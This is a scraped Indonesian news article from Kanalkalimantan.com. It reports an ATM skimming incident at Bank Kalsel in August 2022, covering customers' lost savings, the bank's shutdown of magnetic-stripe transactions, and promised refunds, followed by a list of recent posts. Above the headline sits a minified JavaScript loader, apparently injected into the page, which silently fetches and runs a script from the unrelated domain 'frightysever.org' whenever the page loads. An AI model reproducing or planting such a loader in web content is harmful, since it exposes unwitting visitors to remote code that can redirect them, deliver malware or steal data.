(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Uang Nasabah Bank Kalsel Lenyap Tiba-tiba, Dirut Akui Ada Kejahatan Skimming


KANALKALIMANTAN.COM, BANJARMASIN – Puluhan pegawai berbaju seragam Aparatur Sipil Negara (ASN) menyerbu kantor pusat Bank Kalsel di Jalan Lambung Mangkurat, Banjarmasin, Senin (1/8/2022).

Mereka hendak memastikan keamanan uang yang disimpan di bank milik pemerintah daerah, menyusul tiba-tiba uang saldo di rekening mereka hilang begitu saja.

Salah satu ASN di lingkungan Pemerintah Provinsi Kalimantan Selatan, Salmah dibikin terkejut saat hendak tarik uang sebesar Rp 3 juta, mendapati saldo tabungan Rp 20 juta tak lagi ada.

“Pas saya coba mau tarik uang Rp 3 juta di ATM uangnya, tapi kata mesin uangnya tidak mencukupi, lalu saya cek saldo dan saya lihat uangnya habis. Jika dihitung total uang saya yang raib mencapai Rp20 juta,” ucap ASN di Dinas Pendidikan Pemprov Kalsel ini, Senin (1/8/2022).

 

Ia pun langsung mendatangi Bank Kalsel Cabang Utama di Jalan Lambung Mangkurat Banjarmasin melaporkan kejadian tersebut kepada petugas.

Dari laporannya itu pihak Bank Kalsel mengatakan, rekening atas nama Salmah salah satu dari nasabah Bank Kalsel terkena kejahatan skimming.

Baca juga: Jalur Khusus di SPBU Dicabut, Organda Kalsel-Sopir Truk Protes ke Balai Kota Banjarmasin

“Kita mendapatkan laporan beberapa nasabah Bank Kalsel sejak pagi tadi berkurang dananya secara mendadak di tabungan mereka. Nah kami pun langsung melakukan respon cepat dengan mengindentifikasinya sebagai kejahatan skimming dan melakukan berbagai langkah strategis agar tidak semakin banyak nasabah yang menjadi korban,” tegas Direktur Utama Bank Kalsel Hanawijaya, Senin (1/8/2022) siang.

Manajeman Bank Kalsel mematikan sementara sistem magnetic stripes di ATM Bank Kalsel agar tidak terjadi lagi proses skimming yang lebih banyak kepada nasabah Bank Kalsel. Walau dimatikan ATM Bank Kalsel tetap bisa digunakan seperti biasa oleh nasabah, jika nasabah sudah memiliki kartu dengan sistem chip.

Baca juga: Kronologi Perempuan Pengendara Honda Beat Tewas di Depan Taman Van der Pijl Banjarbaru, Motor Hilang Kendali, Kepala Terlindas Bus

“Karena kita matikan tadi sistem magnetic stripes di ATM Bank Kalsel, makanya sampai saat ini tidak ada lagi laporan terbaru terkait skimming. Kalau pun ada yang komplain adalah nasabah yang terkena skimming pada malam hingga tadi pagi saja yang jumlahnya hanya mencapai puluhan orang,” tambahnya.

Selain itu pihaknya juga sudah melakukan identifikasi secara menyeluruh kepada ATM Bank Kalsel yang diduga digunakan oleh pelaku untuk melakukan skimming.

Dirut Bank Kalsel memastikan, nasabah Bank Kalsel yang terkena skimming hingga uangnya raib di tabungan dipastikannya akan diganti secara utuh. Bank Kalsel sendiri juga memastikan sudah mengetahui siapa saja nasabahnya yang terkena skimming.

Baca juga: Mancing Mania Beradu Teknik Tradisional Mamair di Persawahan Desa Munggu Raya

“Bagi yang lapor atau belum lapor dan kita pastikan mereka yang terkena skimming, kami pastikan uangnya akan dikembalikan secara utuh hari ini juga. Jadi saya harapkan masyarakat tidak perlu khawatir,” bebernya.

Dirinya juga mengimbau kepada nasabah Bank Kalsel agar tidak menjadi korban skimming perlu melakukan sejumlah hal, diantaranya mengganti PIN ATM secara berkala, menjaga kerahasiaan PIN ATM hingga memanfaatkan mobile Banking Bank Kalsel untuk melakukan berbagai transaksi keuangan. (Kanalkalimantan.com/kk)

Reporter : kk
Editor : bie


Al Ghifari

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

5 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

7 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

7 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

8 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

12 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

15 jam ago

This website uses cookies.